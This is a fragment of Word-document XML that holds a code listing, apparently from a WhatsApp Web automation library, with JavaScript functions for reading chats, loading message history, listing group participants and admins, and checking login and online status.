          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        text += possible.charAt(Math.floor(Math.random() * possible.length));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return text;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window.WAPI.getChatById = function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let found = WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (found) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        found = WAPI._serializeChatObj(found);</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found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found;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 return all unread messages from an asked chat and mark them as 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chat id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * :type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includeMe: indicates if user messages have to be included</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * :type  includeMe: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includeNotifications: indicates if notifications have to be included</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * :type  includeNotifications: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list of unread messages from asked chat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * :rtype: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window.WAPI.getUnreadMessagesInChat = function (id, includeMe, includeNotifications) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // get chat and its messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let chat = WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let messages = chat.msgs._models;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initialize result list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let 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look for unread messages, newest is at the end of array</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    for (let i = messages.length - 1; i &gt;= 0; i--) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        // system message: skip it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (i === "remove")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get message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        let messageObj = messages[i];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found a read message: stop looking for others</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (typeof (messageObj.isNewMsg) !== "boolean" || messageObj.isNewMsg === false)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messageObj.isNewMsg = false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            // process it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            let message = WAPI.processMessageObj(messageObj,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                includeMe,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                includeNotifications);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save processed message on result list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (message)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                output.push(message);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result list</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more messages in chat object from server. Use this in a while loop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chat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns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window.WAPI.loadEarlierMessages = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const chat = WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (chat) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const someEarlierMessages = await chat.loadEarlierMsgs();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (someEarlierMessages) return someEarlierMessages.map(WAPI._serializeMessageObj);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more messages in chat object from store by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chat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns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window.WAPI.loadAllEarlierMessages = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const found = WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    while (!found.msgs.msgLoadState.noEarlierMsgs) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        console.log('loading more messages')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        await found.loadEarlierMsgs();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window.WAPI.asyncLoadAllEarlierMessages = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await window.WAPI.loadAllEarlierMessages(id);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window.WAPI.areAllMessagesLoaded = function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const found = WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!found.msgs.msgLoadState.noEarlierMsgs)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Load more messages in chat object from store by ID till a particular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chat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param lastMessage UTC timestamp of last message to be loaded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns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window.WAPI.loadEarlierMessagesTillDate = async function (id, lastMessage) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const found = WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    x = async function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (found.msgs.models[0].t &gt; lastMessage &amp;&amp; !found.msgs.msgLoadState.noEarlierMsgs) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            return await found.loadEarlierMsgs().then(x);</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all group metadata objects from store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{Array|*} List of group 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window.WAPI.getAllGroupMetadata = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return window.Store.GroupMetadata.map((groupData) =&gt; groupData.all);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group metadata object from store by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group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns {T|*} Group metadata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window.WAPI.getGroupMetadata = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return window.Store.GroupMetadata.find(id);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group participants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group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns {Promise.&lt;*&gt;} Yields group metadata</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window.WAPI._getGroupParticipants = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return (await WAPI.getGroupMetadata(id)).participants;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Fetches IDs of group participants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group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns {Promise.&lt;Array|*&gt;} Yields list of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window.WAPI.getGroupParticipantIDs = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return (await WAPI._getGroupParticipants(id))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        .map((participant) =&gt; participant.id._serialized);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window.WAPI.getGroupAdmins = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return (await WAPI._getGroupParticipants(id))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        .filter((participant) =&gt; participant.isAdmin)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        .map((admin) =&gt; admin.id._serialized);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WAPI.iAmAdmin = async function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return (await Promise.all(Store.GroupMetadata.models.map(({ id }) =&gt; Store.GroupMetadata.find(id)))).filter(({ participants }) =&gt; participants.iAmAdmin() || participants.iAmSuperAdmin()).map(({ id }) =&gt; id._serialized);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an object with all of your host device details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window.WAPI.getMe = function ()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...WAPI.quickClean({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            ...Store.Contact.get(Store.Me.wid).attributes,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            ...Store.Me.attributes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 Store.Me.me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window.WAPI.isLoggedIn = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Contact always exists when logged in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const isLogged = window.Store.Contact &amp;&amp; window.Store.Contact.checksum !== undefined;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return isLogged;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window.WAPI.isConnected = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Phone or connection Disconnected icon appears when phone or connection is disconnected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const isConnected = (document.querySelector('[data-testid="alert-phone"]') == null &amp;&amp; document.querySelector('[data-testid="alert-computer"]') == null) ? true : false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return isConnected;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 dont think this will work for group chats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.isChatOnline = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Store.Chat.get(id) ? await Store.Chat.get(id).presence.subscribe().then(_ =&gt; Store.Chat.get(id).presence.attributes.isOnline)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window.WAPI.processMessageObj = function (messageObj, includeMe, includeNotifications) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (messageObj.isNotification) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (includeNotifications)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            return WAPI._serializeMessageObj(messageObj);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        else</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        // System message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        // (i.e. "Messages you send to this chat and calls are now secured with end-to-end encryption...")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    } else if (messageObj.id.fromMe === false || includeMe) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return WAPI._serializeMessageObj(messageObj);</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window.WAPI.getAllMessagesInChat = function (id, includeMe = false, includeNotifications = false, clean = false) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const chat = WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let output = chat.msgs._models || [];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!includeMe) output = output.filter(m =&gt; !m.id.fromMe)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!includeNotifications) output = output.filter(m =&gt; !m.isNotification)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return (clean ? output.map(WAPI.quickClean) : output.map(WAPI._serializeMessageObj))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window.WAPI.loadAndGetAllMessagesInChat = function (id, includeMe, includeNotifications) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return WAPI.loadAllEarlierMessages(id).then(_ =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const chat = WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        let output = [];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const messages = chat.msgs._models;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 in messages) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
